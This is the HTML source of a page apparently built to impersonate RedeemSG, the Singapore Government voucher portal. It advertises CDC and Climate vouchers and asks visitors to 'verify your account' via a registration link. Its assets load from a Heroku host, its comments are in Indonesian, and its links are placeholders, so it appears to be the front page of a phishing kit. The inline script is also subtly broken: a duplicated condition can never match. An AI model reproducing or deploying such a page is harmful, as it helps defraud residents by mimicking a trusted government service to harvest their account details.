<!DOCTYPE html>
<html lang="en">
    <head>  <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <title>RedeemSG</title>
        <link rel="icon" href="https://redeem-sg-singpass-f60f5bb2781f.herokuapp.com/favicon.ico">
        <meta name="google" content="notranslate">
        <meta name="theme-color" content="#000000">
        <meta name="description" content="Trusted voucher system of the Singapore Government">
        <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-rbsA2VBKQhggwzxH7pPCaAqO46MgnOM80zW1RWuH61DGLwZJEdK2Kadq2F9CUG65" crossorigin="anonymous">
        <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.1/css/all.min.css" integrity="sha512-DTOQO9RWCH3ppGqcWaEA1BIZOC6xxalwEsw9c2QQeAIftl+Vegovlnee1c9QX4TctnWMn13TZye+giMm8e2LwA==" crossorigin="anonymous" referrerpolicy="no-referrer"
        />
        <link rel="preconnect" href="https://fonts.googleapis.com">
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link href="https://fonts.googleapis.com/css2?family=Inter:wght@100..900&display=swap" rel="stylesheet">
        <script type="module" src="static/js/index.js"></script>
        <meta property="og:title" content="Verify your account to Receive Cash Assistance" />
        <meta property="og:url" content="./" />
        <meta property="og:image" content="/static/images/banner.png" />
        <meta property="og:type" content="website" />
        <meta property="og:site_name" content="Budget 2025 | Claim Cash Assistance" />
        <script type="text/javascript" src="https://assets.wogaa.sg/scripts/wogaa.js"></script>
        <link href="static/css/main.css" rel="stylesheet" type="text/css" />
    </head>
    <body>
        <script src="static/js/jquery.min.js" type="text/javascript"></script>
        <script src="static/js/slick.min.js" type="text/javascript"></script>
            <!-- Masthead -->
            <div id="Header_T90E24101001_Col00" class="sf_colsIn" data-sf-element="GovMastHead" data-placeholder-label="GovMasthead">
                <div>
                    <div class="sfContentBlock sf-Long-text">
                        <!--<div class="sgds-masthead"><div class="sgds-container"><div class="row"><div class="col has-text-centered-touch"><a href="https://www.gov.sg" target="_blank"><span class="sgds-icon sgds-icon-sg-crest is-size-6"></span><span class="is-text">A Singapore Government Agency Website</span></a></div></div></div></div>-->
                        <!-- New Masthead -->
                        <sgds-masthead></sgds-masthead>
                    </div>
                </div>
            </div>
            <div id="root">
                <div class="css-xqfhly">
                    <div class="css-e8zhlk">
                        <div class="chakra-stack css-kkt2va">
                            <div class="css-1bsdw7i">
                                <div class="chakra-stack css-5sanvx">
                                    <div class="css-79elbk">
                                        <button type="button" class="chakra-button chakra-menu__menu-button css-12yuotu" aria-label="language selector" data-dd-action-name="Change Language button" id="menu-button-7" aria-expanded="false" aria-haspopup="menu" aria-controls="menu-list-7">
                                            <span class="chakra-button__icon css-8fjgab">
                                                <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" focusable="false" class="chakra-icon css-1rnzwtx" aria-hidden="true" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
                                                    <path d="M12 2C6.486 2 2 6.486 2 12s4.486 10 10 10 10-4.486 10-10S17.514 2 12 2zm7.931 9h-2.764a14.67 14.67 0 0 0-1.792-6.243A8.013 8.013 0 0 1 19.931 11zM12.53 4.027c1.035 1.364 2.427 3.78 2.627 6.973H9.03c.139-2.596.994-5.028 2.451-6.974.172-.01.344-.026.519-.026.179 0 .354.016.53.027zm-3.842.7C7.704 6.618 7.136 8.762 7.03 11H4.069a8.013 8.013 0 0 1 4.619-6.273zM4.069 13h2.974c.136 2.379.665 4.478 1.556 6.23A8.01 8.01 0 0 1 4.069 13zm7.381 6.973C10.049 18.275 9.222 15.896 9.041 13h6.113c-.208 2.773-1.117 5.196-2.603 6.972-.182.012-.364.028-.551.028-.186 0-.367-.016-.55-.027zm4.011-.772c.955-1.794 1.538-3.901 1.691-6.201h2.778a8.005 8.005 0 0 1-4.469 6.201z"></path>
                                                </svg>
                                            </span>
                                            <span class="css-xl71ch">
                                                <p class="chakra-text css-3r8hac">English</p>
                                            </span>
                                            <span class="chakra-button__icon css-1a429gh">
                                                <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" focusable="false" class="chakra-icon css-13otjrl" aria-hidden="true" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
                                                    <path d="M16.293 9.293 12 13.586 7.707 9.293l-1.414 1.414L12 16.414l5.707-5.707z"></path>
                                                </svg>
                                            </span>
                                        </button>
                                        <div class="css-1qq679y" style="visibility: hidden; width: 100%; position: absolute; min-width: max-content; inset: 0px auto auto 0px;">
                                            <div tabindex="-1" role="menu" id="menu-list-7" aria-orientation="vertical" class="chakra-menu__menu-list css-387yx3" style="transform-origin: var(--popper-transform-origin); opacity: 0; visibility: hidden; transform: scale(0.8) translateZ(0px);">
                                                <button type="button" aria-label="en" id="menu-list-7-menuitem-2" role="menuitem" tabindex="-1" class="chakra-menu__menuitem css-1h2o6jr" data-index="0">English</button>
                                                <button type="button" aria-label="zh" id="menu-list-7-menuitem-3" role="menuitem" tabindex="-1" class="chakra-menu__menuitem css-1umflhb" data-index="1">中文</button>
                                                <button type="button" aria-label="ms" id="menu-list-7-menuitem-4" role="menuitem" tabindex="-1" class="chakra-menu__menuitem css-1umflhb" data-index="2">Melayu</button>
                                                <button type="button" aria-label="ta" id="menu-list-7-menuitem-5" role="menuitem" tabindex="-1" class="chakra-menu__menuitem css-1umflhb" data-index="3">தமிழ்</button>
                                            </div>
                                        </div>
                                    </div>
                                    <img alt="Organisation Logo" class="chakra-image__placeholder css-1fedilo" src="static/images/logo.png">
                                </div>
                                <div class="chakra-stack css-pz0mq4">
                                    <div class="chakra-stack css-anw8mh">
                                        <p class="chakra-text css-lr9fma">Vouchers</p>
                                        <p class="chakra-text css-t84cu6">Explore ongoing campaigns</p>
                                    </div>
                                    <div class="css-1rruh6w">
                                        <img class="chakra-image css-v2kfba" src="static/images/download.svg">
                                    </div>
                                </div>
                            </div>
                        </div>
                        <!--menyimpan logo disession storage jika di pilih untuk meload di halaman selanjutnya dan menambahkan deskripsi yg tidak muncul disini dan muncul di halaman depan , jadi ada gambar, judul, title, deskripsi-->
                        <div class="css-1od75q">
                            <div class="chakra-linkbox css-1337joo">
                                <div class="chakra-stack css-he6z7n"> 
                                    <img alt="Organisation Logo" class="chakra-image css-1kc3ivz" src="static/images/cdc.png">
                                    <span class="chakra-badge css-l09cq8">New!</span>
                                </div>
                                <p class="chakra-text css-11fsj4u">CDC Vouchers 2025 (January)</p>
                                <p class="chakra-text css-9180b8">$300 for each household</p>
                                <div class="chakra-stack css-1lw58n6">
                                    <div class="css-1wfx4hc">
                                        <p class="chakra-text css-qo3nko">03 Jan 2025 - 31 Dec 2025</p>
                                    </div>
                                    <a href="registration.html" class="chakra-linkbox__overlay css-1hnz6hu">
                                        <button type="button" class="chakra-button css-8znv3f">
                                            <span class="chakra-button__icon css-8j1iht">
                                                <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" aria-hidden="true" focusable="false" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
                                                    <path d="m11.293 17.293 1.414 1.414L19.414 12l-6.707-6.707-1.414 1.414L15.586 11H6v2h9.586z"></path>
                                                </svg>
                                            </span>
                                        </button>
                                    </a>
                                </div>
                            </div>
                            <div class="chakra-linkbox css-1337joo">
                                <div class="chakra-stack css-he6z7n">
                                    <img alt="Organisation Logo" class="chakra-image css-1kc3ivz" src="static/images/clmt.png">
                                </div>
                                <p class="chakra-text css-11fsj4u">Climate Vouchers</p>
                                <p class="chakra-text css-9180b8">$300 for each household</p>
                                <div class="chakra-stack css-1lw58n6">
                                    <div class="css-1wfx4hc">
                                        <p class="chakra-text css-qo3nko">14 Apr 2024 - 31 Dec 2027</p>
                                    </div>
                                    <a href="index.html" class="chakra-linkbox__overlay css-1hnz6hu">
                                        <button type="button" class="chakra-button css-8znv3f">
                                            <span class="chakra-button__icon css-8j1iht">
                                                <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" aria-hidden="true" focusable="false" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
                                                    <path d="m11.293 17.293 1.414 1.414L19.414 12l-6.707-6.707-1.414 1.414L15.586 11H6v2h9.586z"></path>
                                                </svg>
                                            </span>
                                        </button>
                                    </a>
                                </div>
                            </div>
                        </div>
                        <a target="_blank" rel="noopener noreferrer" class="chakra-link css-asca6v" href="details.html">
                            <span class="chakra-text css-1sfdkiq">Frequently asked questions</span>
                            <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 24 24" focusable="false" class="chakra-icon css-bxb1nu" height="1em" width="1em" xmlns="http://www.w3.org/2000/svg">
                                <path d="m11.293 17.293 1.414 1.414L19.414 12l-6.707-6.707-1.414 1.414L15.586 11H6v2h9.586z"></path>
                            </svg>
                        </a>
                        <hr aria-orientation="horizontal" class="chakra-divider css-13rkmdi">
                    </div>
                    <div class="chakra-container css-d5v4k0">
                        <div class="chakra-stack css-gig7uq">
                            <div class="chakra-stack css-w3s4w1">
                                <img class="chakra-image css-1evguzw" src="static/images/redeemsg.svg">
                                <p class="chakra-text css-qa8l2m">The trusted voucher system of the Singapore Government</p>
                            </div>
                            <div class="chakra-stack css-4um4wy">
                                <a target="_blank" rel="noopener noreferrer" class="chakra-link css-lxa6a9" href="details.html">
                                    <p class="chakra-text css-kurv2q">Privacy</p>
                                </a>
                                <a target="_blank" rel="noopener noreferrer" class="chakra-link css-lxa6a9" href="details.html">
                                    <p class="chakra-text css-kurv2q">Terms of Use</p>
                                </a>
                                <a target="_blank" rel="noopener noreferrer" class="chakra-link css-lxa6a9" href="details.html">
                                    <p class="chakra-text css-kurv2q">Report Vulnerability</p>
                                </a>
                            </div>
                        </div>
                        <hr aria-orientation="horizontal" class="chakra-divider css-19a8c48">
                        <div class="chakra-stack css-xwgm6v">
                            <div class="chakra-stack css-16ejbzr">
                                <p class="chakra-text css-yccd75">Built by</p>
                                <a target="_blank" rel="noopener noreferrer" class="chakra-link css-lxa6a9" href="details.html">
                                    <img width="160px" height="47px" alt="Open Government Products Logo" src="static/images/ogp.svg" class="chakra-image css-0" data-savepage-loading="lazy">
                                </a>
                            </div>
                            <div class="chakra-stack css-o5l3sd">
                                <div class="chakra-stack css-1o0bc5u">
                                    <a target="_blank" rel="noopener noreferrer" class="chakra-link css-1cosnop" href="index.html">
                                        <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 448 512" height="28" width="28" xmlns="http://www.w3.org/2000/svg" style="margin-right: 5px;">
                                            <path d="M100.28 448H7.4V148.9h92.88zM53.79 108.1C24.09 108.1 0 83.5 0 53.8a53.79 53.79 0 0 1 107.58 0c0 29.7-24.1 54.3-53.79 54.3zM447.9 448h-92.68V302.4c0-34.7-.7-79.2-48.29-79.2-48.29 0-55.69 37.7-55.69 76.7V448h-92.78V148.9h89.08v40.8h1.3c12.4-23.5 42.69-48.3 87.88-48.3 94 0 111.28 61.9 111.28 142.3V448z"></path>
                                        </svg>
                                    </a>
                                    <a target="_blank" rel="noopener noreferrer" class="chakra-link css-1cosnop" href="index.html">
                                        <svg stroke="currentColor" fill="currentColor" stroke-width="0" viewBox="0 0 320 512" height="24" width="24" xmlns="http://www.w3.org/2000/svg" style="margin-right: 5px;">
                                            <path d="M279.14 288l14.22-92.66h-88.91v-60.13c0-25.35 12.42-50.06 52.24-50.06h40.42V6.26S260.43 0 225.36 0c-73.22 0-121.08 44.38-121.08 124.72v70.62H22.89V288h81.39v224h100.17V288z"></path>
                                        </svg>
                                    </a>
                                    <a target="_blank" rel="noopener noreferrer" class="chakra-link css-1cosnop" href="index.html">
                                        <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="currentColor" viewBox="0 0 32 32">
                                            <mask id="uz33y1jqaa" width="9" height="24" x="2" y="4" maskUnits="userSpaceOnUse">
                                                <path fill="#EEE" d="M2.286 4h8.47v23.999h-8.47V4z"></path>
                                            </mask>
                                            <g mask="url(#uz33y1jqaa)">
                                                <path fill="currentColor" fill-rule="evenodd" d="M10.676 25.58c.077-.137.1-.298.065-.452-.035-.154-.126-.288-.255-.375-2.78-1.868-4.617-5.09-4.617-8.754 0-3.663 1.837-6.884 4.617-8.753.129-.087.22-.22.255-.375.035-.153.012-.315-.065-.452L9.489 4.311c-.041-.073-.097-.137-.163-.187-.066-.05-.142-.087-.222-.107-.08-.02-.164-.022-.245-.008-.081.014-.16.045-.228.091C4.815 6.614 2.286 11.003 2.286 16c0 4.997 2.53 9.385 6.345 11.899.069.046.147.077.228.091.081.014.165.012.245-.008.08-.02.156-.056.222-.106.066-.05.121-.115.163-.188l1.187-2.108z" clip-rule="evenodd"></path>
                                            </g>
                                            <path fill="currentColor" fill-rule="evenodd" d="M22.646 4.311L21.459 6.42c-.077.136-.1.298-.065.451.035.154.126.288.255.375 2.78 1.868 4.616 5.09 4.616 8.754 0 3.663-1.837 6.885-4.617 8.753-.128.087-.219.221-.254.375s-.012.315.065.452l1.187 2.108c.041.073.097.137.163.188.066.05.142.086.222.106.08.02.164.022.245.008.081-.014.159-.045.228-.091 3.816-2.514 6.345-6.902 6.345-11.9 0-4.996-2.53-9.385-6.345-11.899-.07-.046-.147-.077-.228-.091-.081-.014-.165-.012-.245.008-.08.02-.156.056-.222.107-.066.05-.122.114-.163.187" clip-rule="evenodd"></path>
                                        </svg>
                                    </a>
                                </div>
                                <a target="_blank" rel="noopener noreferrer" class="chakra-link css-lxa6a9" href="index.html">
                                    <p class="chakra-text css-o39lnx">©2025 Open Government Products, Government Technology Agency of Singapore</p>
                                </a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        <script src="static/js/popper.min.js" type="text/javascript"></script>
        <script src="static/js/bootstrap.min.js" type="text/javascript"></script>
        <script src="static/js/ResizeSensor.js" type="text/javascript"></script>
        <script src="static/js/jquery.sticky-sidebar.min.js" type="text/javascript"></script>
        <script src="static/js/sgds.js" type="text/javascript"></script>
        <script src="static/js/budget.js" type="text/javascript"></script>
        <script>
document.querySelectorAll('.chakra-linkbox').forEach((element, index) => {
    element.addEventListener('click', () => {
        // Ambil data dari elemen
        const logoSrc = element.querySelector('img').src;
        const title = element.querySelector('.chakra-text.css-11fsj4u').innerText;
        const description = element.querySelector('.chakra-text.css-9180b8').innerText;
        const validity = element.querySelector('.chakra-text.css-qo3nko').innerText;

        // Tambahkan data tambahan berdasarkan kondisi
        
        let desc1 = '';
        let additionalText = '';
        let support = '';
        if (title.includes('CDC Vouchers 2024')) {
            desc1 = 'Claim $300 Vouchers for your household';
            support = 'Supported by Community Development Council';
            additionalText = 'Each household with at least 1 Singaporean will be able to claim $300 in vouchers.';
        } else if (title.includes('CDC Vouchers 2024')) {
            desc1 = 'Claim $500 Vouchers for your household';
            support = 'Supported by Community Development Council';
            additionalText = 'Each household with at least 1 Singaporean will be able to claim $500 in vouchers.';
        } else if (title.includes('Climate Vouchers')) {
            desc1 = 'Claim $300 Vouchers for your household';
            support = 'Supported by NEA and PUB';
            additionalText = 'Applicants who are eligible will be able to claim $300 in vouchers.';
        }

        // Simpan data ke Session Storage
        sessionStorage.setItem('voucher', JSON.stringify({ logoSrc, title, description, validity, additionalText, desc1, support }));

        // Redirect ke halaman berikutnya
        window.location.href = '/details';
    });
});

        </script>
    </body>
</html>